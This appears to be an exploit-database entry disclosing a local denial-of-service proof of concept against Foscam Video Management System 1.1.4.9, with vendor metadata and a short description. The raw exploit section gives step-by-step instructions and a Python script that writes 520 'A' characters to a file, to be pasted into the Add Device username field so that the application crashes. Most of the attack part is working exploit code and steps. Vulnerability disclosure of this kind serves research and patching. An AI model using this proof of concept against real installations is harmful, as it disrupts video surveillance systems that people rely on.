header-logo
Suggest Exploit
vendor:
Foscam Video Management System
by:
chuyreds
7.5
CVSS
HIGH
Denial of Service (DoS) Local
CWE
Product Name: Foscam Video Management System
Affected Version From: 1.1.4.9
Affected Version To: 1.1.4.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro x64 es
2019

Foscam Video Management System 1.1.4.9 – ‘Username’ Denial of Service (PoC)

The Foscam Video Management System 1.1.4.9 is vulnerable to a denial of service (DoS) attack. By sending a specially crafted username, an attacker can cause the application to crash, resulting in a denial of service condition.

Mitigation:

There is currently no known mitigation for this vulnerability. It is recommended to update to a patched version of the software when available.
Source

Exploit-DB raw data:

# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Author: chuyreds
# Discovery Date: 2019-11-16
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"/"IPC"
# 6.- Copy the content of the file into Username
# 7.- Click on Login Check
# 8.- Crashed
 
buffer = "\x41" * 520
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()